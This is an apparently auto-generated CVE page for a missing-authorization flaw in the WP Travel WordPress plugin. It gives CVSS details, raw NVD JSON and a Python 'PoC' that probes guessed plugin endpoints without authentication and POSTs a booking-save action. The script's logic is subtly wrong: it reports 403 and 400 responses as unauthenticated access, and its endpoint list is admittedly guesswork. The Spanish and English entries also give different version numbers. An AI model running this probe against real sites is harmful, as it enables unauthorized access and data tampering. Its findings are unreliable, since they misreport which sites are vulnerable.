Security Vulnerability Report
中文
CVE-2026-24568 CVSS 5.3 MEDIUM

CVE-2026-24568

Published: 2026-01-23 15:16:15
Last Modified: 2026-04-28 15:16:15

Description

Missing Authorization vulnerability in WP Travel WP Travel wp-travel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Travel: from n/a through <= 11.1.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Travel插件 <= 11.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24568 PoC - WP Travel Broken Access Control # Target: WordPress site with WP Travel plugin <= 11.1.0 import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """Check if target is vulnerable to CVE-2026-24568""" # Vulnerable endpoints that may lack authorization checks vulnerable_endpoints = [ "/wp-json/wp-travel/v1/bookings", "/wp-json/wp-travel/v1/trips", "/wp-json/wp-travel/v1/settings", "/wp-json/wp-travel/v1/pricing", "/wp-admin/admin-ajax.php?action=wp_travel_" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/json" } print(f"[*] Testing CVE-2026-24568 on {TARGET_URL}") for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if endpoint responds without authentication if response.status_code in [200, 201, 400, 403]: print(f"[+] Endpoint {endpoint} is accessible without auth") print(f" Status: {response.status_code}") print(f" Response: {response.text[:200]}...") else: print(f"[-] Endpoint {endpoint} requires authentication") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") print("[*] Testing POST request to sensitive endpoints...") # Test POST request to create/modify data post_data = { "action": "wp_travel_save_booking", "data": "test" } for endpoint in ["/wp-admin/admin-ajax.php"]: url = f"{TARGET_URL}{endpoint}" try: response = requests.post(url, data=post_data, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[+] POST to {endpoint} succeeded without authentication") except requests.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24568", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:14.570", "lastModified": "2026-04-28T15:16:15.230", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WP Travel WP Travel wp-travel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Travel: from n/a through <= 11.1.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en WP Travel WP Travel wp-travel permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WP Travel: desde n/a hasta &lt;= 11.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-travel/vulnerability/wordpress-wp-travel-plugin-11-0-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}